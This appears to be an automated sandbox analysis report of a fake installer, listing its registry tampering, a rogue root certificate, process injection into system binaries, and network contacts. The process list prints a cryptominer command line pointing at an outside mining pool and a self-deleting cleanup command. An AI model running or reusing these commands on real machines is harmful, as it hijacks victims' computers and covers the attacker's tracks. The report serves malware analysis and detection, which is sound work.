| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6306E526-9E02-4696-BFF9-48338A27F8AF}\ProxyStubClsid32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9B4CD3F1-4981-101B-9CA8-9240CE2738AE} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0002-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{32FB36EF-2E57-345C-98BA-051FB07F8F6C} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CID\97428b24-83cc-4966-b120-dee4d93b01f5\Description | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AB968F1E-E20B-403A-9EB8-72EB0EB6797E} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0294-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{70446B90-F93B-3578-9B7B-95D05A12DA60}\4.0.0.0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Windows.CompositeFont\shell\open\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\VLC.mlp\shell\PlayWithVLC\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.sct | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EFA9C1B9-47B0-4BD8-AC63-DDF785C505B4} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6b140a40-d461-555a-b6eb-5dbb8e2101e5} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0002098E-0000-0000-C000-000000000046} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00024495-0000-0000-C000-000000000046}\ProxyStubClsid32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{51973C2C-CB0C-11D0-B5C9-00A0244A0E7A} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{C3689F20-C231-11CE-A30C-00AA004A3D3C} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\shell\OpenWithSetDefaultOn | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4D170556-98A1-43DD-B2EC-50C90CF248DF} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.svg | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{000209FE-0000-0000-C000-000000000046}\InprocHandler32 | C:\Windows\regedit.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\SETAP_9191__PA$$W0rdS~!^!.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\IObitUnlockerPortable.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Set-up.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Set-up.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\ProgramData\CAFIJKFHIJ.exe | N/A |
| N/A | N/A | C:\ProgramData\CAFHIJDHDG.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\help\fxcloud.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\help\fxcloud.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\help\fxcloud.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\SETAP_9191__PA$$W0rdS~!^!.zip
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3792,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PublishSet.mpeg"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.0.306093867\1207828895" -parentBuildID 20230214051806 -prefsHandle 1756 -prefMapHandle 1748 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5cfeff09-00fd-4afd-ab4b-49ddfd7006cf} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 1848 2259b90ef58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.1.149958981\2019989710" -parentBuildID 20230214051806 -prefsHandle 2404 -prefMapHandle 2392 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c72244b-5c69-4ec6-ad08-369ffaecf285} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 2416 22587589958 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.2.1134724445\1139413036" -childID 1 -isForBrowser -prefsHandle 3012 -prefMapHandle 3008 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b268f74-c367-4eca-b7f1-a9e3eb540b04} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 3024 2259dfeb858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.3.935600193\790870425" -childID 2 -isForBrowser -prefsHandle 4216 -prefMapHandle 4212 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c44e9e7-d2de-4432-8aa3-26e832047fb1} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 4228 225a0bc7b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.4.24902912\2125274360" -childID 3 -isForBrowser -prefsHandle 5048 -prefMapHandle 5012 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d92816c-1d23-44c8-8b18-d71b6499d721} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 5056 225a2f9c858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.5.1911889249\1316800176" -childID 4 -isForBrowser -prefsHandle 5188 -prefMapHandle 5044 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {efb6b0ad-9901-49c2-943e-9cb64fc7d4ad} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 5176 225a2f9cb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.6.772719190\1642011243" -childID 5 -isForBrowser -prefsHandle 5368 -prefMapHandle 5372 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60214734-3ca6-4012-8a5a-f0092fe39891} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 5452 225a2fec958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.7.671205793\922696505" -childID 6 -isForBrowser -prefsHandle 1556 -prefMapHandle 2824 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87c1463d-755f-47c5-a0db-c554a7570834} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 5204 225a0326158 tab
C:\Users\Admin\Desktop\Set-up.exe
"C:\Users\Admin\Desktop\Set-up.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\AppData\Local\Temp\dcom.au3
C:\Users\Admin\AppData\Local\Temp\dcom.au3
C:\Users\Admin\Desktop\Set-up.exe
"C:\Users\Admin\Desktop\Set-up.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3604,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=3140 /prefetch:3
C:\ProgramData\CAFIJKFHIJ.exe
"C:\ProgramData\CAFIJKFHIJ.exe"
C:\ProgramData\CAFHIJDHDG.exe
"C:\ProgramData\CAFHIJDHDG.exe"
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Users\Admin\AppData\Local\Temp\dcom.au3
C:\Users\Admin\AppData\Local\Temp\dcom.au3
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KECBFBAEBKJJ" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4124,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=3112 /prefetch:8
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.121.18.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:49848 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | tcp |
| US | 34.117.188.166:443 | spocs.getpocket.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 52.42.69.239:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | 239.69.42.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:49855 | tcp | |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | workupload.com | udp |
| DE | 5.9.116.176:80 | workupload.com | tcp |
| US | 8.8.8.8:53 | workupload.com | udp |
| US | 8.8.8.8:53 | workupload.com | udp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 176.116.9.5.in-addr.arpa | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| GB | 142.250.187.238:443 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | workupload.com | udp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | f92.workupload.com | udp |
| DE | 138.201.30.227:443 | f92.workupload.com | tcp |
| US | 8.8.8.8:53 | f92.workupload.com | udp |
| US | 8.8.8.8:53 | f92.workupload.com | udp |
| US | 8.8.8.8:53 | 227.30.201.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | poocoin.online | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.249.124.192.in-addr.arpa | udp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | 18.53.55.162.in-addr.arpa | udp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | businessdownloads.ltd | udp |
| US | 104.21.16.123:443 | businessdownloads.ltd | tcp |
| US | 8.8.8.8:53 | 123.16.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | i.imgur.com | udp |
| US | 199.232.196.193:443 | i.imgur.com | tcp |
| US | 8.8.8.8:53 | 193.196.232.199.in-addr.arpa | udp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| FI | 135.181.22.88:80 | 135.181.22.88 | tcp |
| US | 8.8.8.8:53 | 88.22.181.135.in-addr.arpa | udp |
| US | 8.8.8.8:53 | proresupdate.com | udp |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| FI | 65.109.127.181:3333 | tcp | |
| US | 8.8.8.8:53 | 146.112.152.45.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| FI | 65.109.127.181:3333 | tcp | |
| US | 8.8.8.8:53 | workupload.com | udp |
| US | 8.8.8.8:53 | workupload.com | udp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | t.workupload.com | udp |
| DE | 49.13.126.162:443 | t.workupload.com | tcp |
| US | 8.8.8.8:53 | t.workupload.com | udp |
| US | 8.8.8.8:53 | t.workupload.com | udp |
| US | 8.8.8.8:53 | 162.126.13.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.176.76.144.in-addr.arpa | udp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
